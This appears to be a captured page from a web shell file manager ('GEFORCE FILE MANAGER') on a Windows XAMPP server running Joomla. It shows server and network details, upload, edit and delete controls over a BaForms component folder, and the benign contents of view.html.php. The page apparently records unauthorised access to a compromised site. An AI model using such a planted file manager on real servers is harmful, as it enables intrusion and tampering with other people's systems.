[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_baforms
/
views
/
forms
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 tmpl
SET
[ DEL ]
📄 index.html
32 B
SET
[ EDIT ]
|
[ DEL ]
📄 view.html.php
707 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: view.html.php
<?php /** * @package BaForms * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; // import Joomla view library jimport('joomla.application.component.view'); class baformsViewForms extends JViewLegacy { protected $items; protected $pagination; protected $state; public function display($tpl = null) { $this->items = $this->get('ModalItems'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); foreach ($this->items as &$item) { $item->order_up = true; $item->order_dn = true; } parent::display($tpl); } }